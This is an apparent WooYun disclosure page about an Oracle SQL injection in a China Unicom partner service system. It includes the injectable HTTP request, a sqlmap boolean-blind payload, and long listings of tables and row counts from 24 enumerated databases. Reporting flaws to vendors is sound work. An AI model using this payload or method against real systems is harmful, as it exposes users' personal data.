中国联通某站Oracle注入（涉及24个库50W用户信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169912

漏洞标题：中国联通某站Oracle注入（涉及24个库50W用户信息）

漏洞作者： Looke

提交时间：2016-01-14 16:56

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-14：细节已通知厂商并且等待厂商处理中
2016-01-18：厂商已经确认，细节仅向厂商公开
2016-01-28：细节向核心白帽子及相关领域专家公开
2016-02-07：细节向普通白帽子公开
2016-02-17：细节向实习白帽子公开
2016-02-27：细节向公众公开

简要描述：

详细说明：

漏洞系统：中国联通东莞分公司合作伙伴服务系统
系统地址：http://**.**.**.**/
弱口令登陆：
发现注入点：

漏洞地址：

GET /webout/kw/kw.jsp?v_index=%E1%DB%B7%E5&v_state=%27%D3%D0%D0%A7%27&v_flag= HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Referer: http://**.**.**.**/webout/kw/top.jsp?v_flag=
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=183FBB8776B8BB62763FE24A981885DF; csd=36000100; cod=36000050; LastVisitusername=100030

v_state参数存在注入

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/webout/kw/kw.jsp?v_index=%E1%DB%B7%E5&v
_state='%D3%D0%D0%A7') AND 3529=3529 AND (3172=3172&v_flag=
---
[20:23:10] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle

漏洞证明：

24个数据库：

Database: WF
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WORKFLOW_PROC_DETAIL           | 305855  |
| WORKFLOW_PROC_LOG              | 299811  |
| WORKFLOW_PROC                  | 240127  |
| SENDSMS_LOG                    | 233827  |
| WORKFLOW_HIS                   | 169942  |
| WORKFLOW                       | 67805   |
| WORKFLOW_PROC_DETAIL_HIS       | 5606    |
| WORKFLOW_PROC_HIS              | 5593    |
| WORKDAY                        | 3288    |
| WORKDAY2015                    | 2922    |
| WORKFLOW_PROC_CUR              | 1846    |
| WORKFLOW_PROC_LOG_HIS          | 36      |
| WORKFLOW_ATTACH                | 19      |
| WORKFLOW_PROC_MODEL            | 15      |
| CODE_PROCESS_TYPE              | 11      |
| CODE_STATUS                    | 11      |
| CODE_WORKFLOW_TYPE             | 9       |
| CODE_CONTENT_TYPE              | 8       |
| WORKFLOW_ADDSQL_ERRLOG         | 8       |
| WORKFLOW_TYPE_AUTH             | 4       |
| WORKFLOW_ATTACH_HIS            | 1       |
+--------------------------------+---------+
Database: CLUB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| CLUN_MEMBER_DATAVALUE          | 4596169 |
| CLUB_MEMBER_DATASUM            | 302553  |
| CLUB_MEMBER_GPRS               | 245692  |
| TC_SELLER_MEMBER_NEW           | 20174   |
| CLUB_BM                        | 17102   |
| CLUB_MEMBER                    | 9360    |
| CLUB_PLANS                     | 6724    |
| CLUB_MEMBERPONIT               | 5477    |
| CLUB_INFO_USER                 | 5264    |
| V_12                           | 1271    |
| V_1                            | 1269    |
| CLUB_LECTURERPOINT             | 1218    |
| CLUB_SUMMARY                   | 747     |
| CLUB_NEWS                      | 650     |
| CLUB_DOWNLOAD                  | 524     |
| CLUB_EXPERT_INFO               | 134     |
| CLUB_KC                        | 100     |
| CLUB_PHOTO                     | 96      |
| CLUB_WZDG                      | 86      |
| CLUB_BASE_INFO                 | 67      |
| CLUB_KETANG                    | 66      |
| CLUB_QUESTION                  | 49      |
| CLUB_DAREN                     | 48      |
| CLUB_VIDEO                     | 35      |
| CLUB_ACTIVITIES                | 31      |
| CLUB_TOWN                      | 30      |
| V_TEMP4                        | 23      |
| V_PPPP                         | 21      |
| CLUB_PHONE                     | 16      |
| CLUB_JIEKOUREN                 | 15      |
| CLUB_CODE                      | 10      |
| CLUB_PHOTOTYPE                 | 9       |
| CLUB_NEWSTYPE                  | 6       |
| CLUB_OS                        | 4       |
| CLUB_QUESTIONTYPE              | 4       |
| CLUB_LIUYAN                    | 2       |
| CLUB_BASESET                   | 1       |
| CLUB_INTEGRALRULES             | 1       |
| CLUB_INTEGRALTYPES             | 1       |
| CLUB_LOGINUSERS                | 1       |
| CLUB_NEWSPIC                   | 1       |
| CLUB_WEBBASESET                | 1       |
| CLUB_ZHUANJIA                  | 1       |
| CLUB_ZHUANJIANEWS              | 1       |
+--------------------------------+---------+
Database: APEX_030200
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WWV_FLOW_DICTIONARY$           | 70601   |
| WWV_FLOW_STEP_ITEMS            | 9671    |
| WWV_FLOW_REGION_REPORT_COLUMN  | 7903    |
| WWV_FLOW_PAGE_PLUGS            | 7416    |
| WWV_FLOW_STEP_ITEM_HELP        | 6335    |
| WWV_FLOW_LIST_OF_VALUES_DATA   | 4184    |
| WWV_FLOW_MESSAGES$             | 3706    |
| WWV_FLOW_STEP_BUTTONS          | 3513    |
| WWV_FLOW_STEP_BRANCHES         | 3255    |
| WWV_FLOW_LIST_ITEMS            | 3048    |
| WWV_FLOW_STEP_PROCESSING       | 2238    |
| WWV_FLOW_STEP_VALIDATIONS      | 1990    |
| WWV_FLOW_STEPS                 | 1754    |
| WWV_FLOW_MENU_OPTIONS          | 1452    |
| WWV_FLOW_STEP_COMPUTATIONS     | 984     |
| WWV_FLOW_LISTS_OF_VALUES$      | 959     |
| WWV_FLOW_WORKSHEET_COLUMNS     | 721     |
| WWV_FLOW_LISTS                 | 601     |
| WWV_FLOW_REGION_UPD_RPT_COLS   | 439     |
| WWV_FLOW_STANDARD_ICONS        | 319     |
| WWV_FLOW_COUNTRIES             | 240     |
| WWV_FLOW_TRANSLATABLE_COLS$    | 232     |
| WWV_FLOW_SW_MAIN_KEYWORDS      | 199     |
| WWV_FLOW_PAGE_PLUG_TEMPLATES   | 166     |
| WWV_FLOW_LANGUAGES             | 132     |
| WWV_FLOW_LIST_TEMPLATES        | 105     |
| WWV_FLOW_PAGE_GROUPS           | 105     |
| WWV_FLOW_DUAL100               | 100     |
| WWV_FLOW_LANGUAGE_MAP          | 90      |
| WWV_FLOW_ITEMS                 | 89      |
| WWV_FLOW_UPGRADE_PROGRESS      | 89      |
| WWV_MIG_RESERVED_WORDS         | 87      |
| WWV_FLOW_TEMPLATES             | 64      |
| WWV_FLOW_HNT_COLUMN_INFO       | 58      |
| WWV_FLOW_ROW_TEMPLATES         | 54      |
| WWV_FLOW_RESTRICTED_SCHEMAS    | 46      |
| WWV_FLOW_PROCESSING            | 45      |
| WWV_MIG_FRM_OLB_XMLTAGTABLEMAP | 45      |
| WWV_FLOW_PAGE_GENERIC_ATTR     | 44      |
| WWV_FLOW_RANDOM_IMAGES         | 42      |
| WWV_FLOW_UPG_TAB_NAME_CHANGES  | 42      |
| WWV_FLOW_SHORTCUTS             | 39      |
| WWV_FLOW_ALT_CONFIG_PICK       | 37      |
| WWV_FLOW_FIELD_TEMPLATES       | 36      |
| WWV_MIG_FRM_XMLTAGTABLEMAP     | 36      |
| WWV_FLOW_CHARSETS              | 32      |
| WWV_FLOW_COMPANY_TYPES         | 32      |
| WWV_FLOW_WORKSHEET_RPTS        | 30      |
| WWV_FLOW_WORKSHEETS            | 30      |
| WWV_FLOW_STANDARD_CSS          | 27      |
| WWV_FLOW_PLATFORM_PREFS        | 21      |
| WWV_FLOW_SECURITY_SCHEMES      | 19      |
| WWV_FLOW_QUERY_COLUMN          | 18      |
| WWV_FLOW_UPG_TAB_OBSOLETE      | 17      |
| WWV_MIG_RPT_XMLTAGTABLEMAP     | 15      |
| WWV_FLOW_COMPUTATIONS          | 14      |
| WWV_FLOW_WORKSPACE_REQ_SIZE    | 14      |
| WWV_FLOW_BUTTON_TEMPLATES      | 12      |
| WWV_FLOW_ICON_BAR              | 12      |
| WWV_FLOW_CALS                  | 11      |
| WWV_FLOW_CUSTOM_AUTH_SETUPS    | 11      |
| WWV_FLOW_BANNER                | 10      |
| WWV_FLOW_POPUP_LOV_TEMPLATE    | 10      |
| WWV_FLOW_SW_CREATE_KEYWORDS    | 10      |
| WWV_FLOW_THEMES                | 10      |
| WWV_FLOWS                      | 10      |
| WWV_FLOW_CAL_TEMPLATES         | 9       |
| WWV_FLOW_DEVELOPER_ROLES       | 9       |
| WWV_FLOW_PATCHES               | 9       |
| WWV_FLOW_HNT_TABLE_INFO        | 8       |
| WWV_FLOW_MENU_TEMPLATES        | 8       |
| WWV_FLOW_SW_SQLPLUS_CMD        | 8       |
| WWV_FLOW_MENUS                 | 7       |
| WWV_MIG_MENU_XMLTAGTABLEMAP    | 7       |
| WWV_FLOW_LOV_VALUES            | 6       |
| WWV_FLOW_QUERY_CONDITION       | 6       |
| WWV_FLOW_QUERY_DEFINITION      | 6       |
| WWV_FLOW_QUERY_OBJECT          | 6       |
| WWV_FLOW_FLASH_CHART_SERIES    | 5       |
| WWV_FLOW_FLASH_CHARTS          | 5       |
| WWV_FLOW_PICK_PAGE_VIEWS       | 5       |
| WWV_FLOW_TOPLEVEL_TABS         | 5       |
| WWV_MIG_EXPORTER               | 5       |
| WWV_FLOW_PICK_END_USERS        | 4       |
| WWV_FLOW_SW_SET_KEYWORDS       | 4       |
| WWV_COLUMN_EXCEPTIONS          | 3       |
| WWV_FLOW_COMPANIES             | 3       |
| WWV_FLOW_TABS                  | 3       |
| WWV_FLOW_TREES                 | 3       |
| WWV_FLOW_INSTALL               | 2       |
| WWV_FLOW_STANDARD_JS           | 2       |
| WWV_FLOW_ACTIVITY_LOG_NUMBER$  | 1       |
| WWV_FLOW_APPLICATION_GROUPS    | 1       |
| WWV_FLOW_CLICKTHRU_LOG_NUMBER$ | 1       |
| WWV_FLOW_COMPANY_SCHEMAS       | 1       |
| WWV_FLOW_DB_AUTH               | 1       |
| WWV_FLOW_FND_USER              | 1       |
| WWV_FLOW_PASSWORD_HISTORY      | 1       |
| WWV_FLOW_USER_ACCESS_LOG_NUM$  | 1       |
+--------------------------------+---------+
Database: PLANRUN
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| MONITOR_SQL_IMPORT             | 3       |
+--------------------------------+---------+
Database: LIUXIONGHUI
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| V_TEMP22                       | 194     |
+--------------------------------+---------+
Database: CYEC
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| T6_CODE                        | 20000   |
| T6_IPSTORE                     | 18395   |
| T6_SYS_DAYLOOK_IP              | 643     |
| WEIXIN                         | 602     |
| T6_MEMBER                      | 342     |
| T6_ABLUM_PHOTO                 | 320     |
| MMS_SENDLOG                    | 207     |
| T6_INTEN_SCORE                 | 203     |
| T6_NEWS                        | 112     |
| T6_WXM                         | 46      |
| T6_KKMEMBER                    | 43      |
| T6_COM                         | 39      |
| T6_FAV                         | 34      |
| T6_VIDEO_CLUB                  | 34      |
| T6_SCHOOL                      | 29      |
| T6_INTEN_OBJECT                | 25      |
| T6_LOGIN                       | 23      |
| T6_WXSET                       | 23      |
| T6_SHOP                        | 21      |
| T6_INTEN_LEADER                | 19      |
| T6_INTEN_REPORT                | 18      |
| T6_SECONDKILL                  | 16      |
| T6_IMG                         | 12      |
| T6_GUA                         | 11      |
| T6_ANSWER                      | 10      |
| T6_INTENDANCE                  | 10      |
| T6_SCORE                       | 10      |
| T6_ACTIVE_BOOK                 | 9       |
| T6_QR                          | 9       |
| T6_SHOP_ORDER                  | 8       |
| T6_CA                          | 7       |
| T6_NEWS_COMMENT                | 7       |
| T6_REWARD                      | 7       |
| T6_ORDER                       | 6       |
| T6_SYS_DAYLOOK                 | 6       |
| T6_ACTIVE                      | 5       |
| T6_QUESTION                    | 4       |
| T6_SYS_MEMBER                  | 4       |
| T6_PORDER                      | 3       |
| T6_QTERM                       | 2       |
| T6_REWARDTYPE                  | 2       |
| T6_SKTERM                      | 2       |
| T6_APPLY                       | 1       |
| T6_KK_ABLUM                    | 1       |
| T6_PRO                         | 1       |
+--------------------------------+---------+
Database: LT
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| CJWEB                          | 12530   |
| CJWAP                          | 3904    |
| T1                             | 828     |
| CJMINI                         | 388     |
| PRODUCT                        | 325     |
| NEWS                           | 160     |
| MOBILENO                       | 100     |
| CJMOBILE                       | 27      |
| PUR                            | 21      |
| DL                             | 19      |
| LINKS                          | 11      |
| DETAIL186                      | 5       |
| AD                             | 4       |
| HOMEFLASH                      | 4       |
| CJ                             | 3       |
| USERS                          | 2       |
| BRAND                          | 1       |
| CJRULE                         | 1       |
+--------------------------------+---------+
Database: ORDDATA
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| ORDDCM_DICT_ATTRS              | 2418    |
| ORDDCM_STD_ATTRS               | 2415    |
| ORDDCM_UID_DEFS                | 245     |
| ORDDCM_CT_LOCATORPATHS         | 95      |
| ORDDCM_CT_DAREFS               | 72      |
| ORDDCM_CT_PRED                 | 61      |
| ORDDCM_CT_PRED_OPRD            | 53      |
| ORDDCM_INTERNAL_TAGS           | 42      |
| ORDDCM_ANON_ATTRS              | 37      |
| ORDDCM_VR_DT_MAP               | 32      |
| ORDDCM_PREFS_LOOKUP            | 13      |
| ORDDCM_RT_PREF_PARAMS          | 13      |
| ORDDCM_CT_PRED_SET             | 9       |
| ORDDCM_DOCS                    | 9       |
| ORDDCM_INSTALL_DOCS            | 9       |
| ORDDCM_DOC_TYPES               | 8       |
| ORDDCM_CT_ACTION               | 7       |
| ORDDCM_DOC_REFS                | 7       |
| ORDDCM_ANON_ACTION_TYPES       | 4       |
| ORDDCM_ANON_RULE_TYPES         | 3       |
| ORDDCM_ANON_RULES              | 3       |
| ORDDCM_CT_PRED_PAR             | 3       |
| ORDDCM_PRV_ATTRS               | 3       |
| ORDDCM_CT_MACRO_PAR            | 2       |
| ORDDCM_CT_MACRO_DEP            | 1       |
| ORDDCM_DATA_MODEL              | 1       |
| ORDDCM_MAPPING_DOCS            | 1       |
+--------------------------------+---------+
Database: WEBOUT
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| P_ACCESS_LOG                   | 3356013 |
| TF_B_ACCESSLOG                 | 1874463 |
| P_LOGIN_LOG                    | 1785945 |
| TF_B_PAYLOG                    | 1587447 |
| ADMOBILE_ADSL                  | 402082  |
| P_USER_SINGLEPWD               | 106366  |
| P_CODE_USER                    | 102024  |
| P_USER_ROLE                    | 83755   |
| CLUB_VIP_USER                  | 80805   |
| TC_SP_YIJIANTONG               | 73825   |
| P_USER_ROLE_20140523           | 63915   |
| P_CODE_USER_20120410           | 58262   |
| P_USER_ROLE_20120410           | 48912   |
| WEB_SERVICE_PORT_LOG           | 16933   |
| MEMBER_LOG                     | 12710   |
| JYSL_PROCLOG                   | 7100    |
| ADMOBILE_MOBILE                | 6737    |
| P_CODE_USER_20111220           | 5658    |
| JYSL                           | 3391    |
| WAP_ACCESS_LOG                 | 3255    |
| P_ROLE_RIGHT_20120410          | 1608    |
| CLUB_VIP_QP_LOG                | 1386    |
| P_ROLE_RIGHT                   | 1289    |
| P_ROLE_RIGHT_20140523          | 1263    |
| JYSL_RES_MOBILE                | 999     |
| JZSL_RES_MOBILE                | 978     |
| JYSL_FLOW_MAN                  | 935     |
| MEMBER_SCORE                   | 680     |
| P_CODE_RIGHT                   | 448     |
| P_CODE_RIGHT_20120410          | 445     |
| P_CODE_RIGHT_20140523          | 438     |
| TC_ZZTJ_MOBILETYPE_BAK         | 356     |
| JYSL_AD_PHOTO                  | 234     |
| WAP_ZZTJ_LOG                   | 222     |
| LIANGHAO_REC                   | 167     |
| LIANGHAO_NO                    | 130     |
| P_UPLOAD_FILE                  | 106     |
| CLUB_VIP_QP                    | 104     |
| JYSL_AD                        | 94      |
| JZSL_OPER                      | 88      |
| CLUB_VIP_QP_SHUIGUO            | 80      |
| P_CODE_ROLE                    | 80      |
| DL_RESOURCE                    | 76      |
| P_CODE_ROLE_20120410           | 76      |
| JYSL_YD_DINNER                 | 74      |
| JYSL_MOBILE                    | 31      |
| JZSL_DEPT                      | 26      |
| DG_WDGF                        | 24      |
| TEMP_USER                      | 22      |
| WEB_SERVICE_PORT_RET           | 22      |
| JZSL_SALESHOP_CFG              | 21      |
| JR_JIFEN_LOG                   | 17      |
| JYSL_FILE                      | 15      |
| CLUB_CINEMA                    | 13      |
| JYSL_FLOW                      | 13      |
| P_CODE_DEPT                    | 12      |
| JZSL_RES_MOBILE_SELECT         | 11      |
| CLUB_CINEMA_NUMBER             | 10      |
| P_CODE_AREA                    | 10      |
| ADMOBILE_ITEM                  | 8       |
| CLUB_FILM_YD                   | 7       |
| P_PUB_INFO                     | 7       |
| DL_RESOURCE_LOG                | 6       |
| WEB_SERVICE_PORT               | 5       |
| CLUB_CINEMA_TASK               | 3       |
| JZSL_FLOW_MODEL                | 3       |
| P_UPLOAD_FILE_TYPE             | 3       |
| JYSL_MOBILE_FEE_IMPORT         | 2       |
| JYSL_ORDER_FILE                | 2       |
| P_CODE_APP                     | 2       |
| XSQD_PUBINFO                   | 2       |
| CLUB_FILM_DH                   | 1       |
| DG_TEST                        | 1       |
| JYSL_MOBILE_FEE                | 1       |
| JZSL_AGENT                     | 1       |
| JZSL_AGENT_BIZ                 | 1       |
| JZSL_BIZ_TYPE                  | 1       |
| JZSL_FLOW_CURRENT              | 1       |
| JZSL_FLOW_CURRENT_OPER         | 1       |
| JZSL_MOBILE_POOL               | 1       |
| JZSL_ORDER                     | 1       |
| JZSL_ORDER_FILE                | 1       |
| WO_DETAINMENT                  | 1       |
| XSQD_PUBINFO_FILE              | 1       |
+--------------------------------+---------+

50W用户信息

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-01-18 18:41

厂商回复：

CNVD确认所述情况，已经转由CNCERT下发给广东分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169912

漏洞标题：中国联通某站Oracle注入（涉及24个库50W用户信息）

相关厂商：中国联通

漏洞作者： Looke

提交时间：2016-01-14 16:56

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169912

漏洞标题：中国联通某站Oracle注入（涉及24个库50W用户信息）

相关厂商：中国联通

漏洞作者： Looke

提交时间：2016-01-14 16:56

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0169912"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：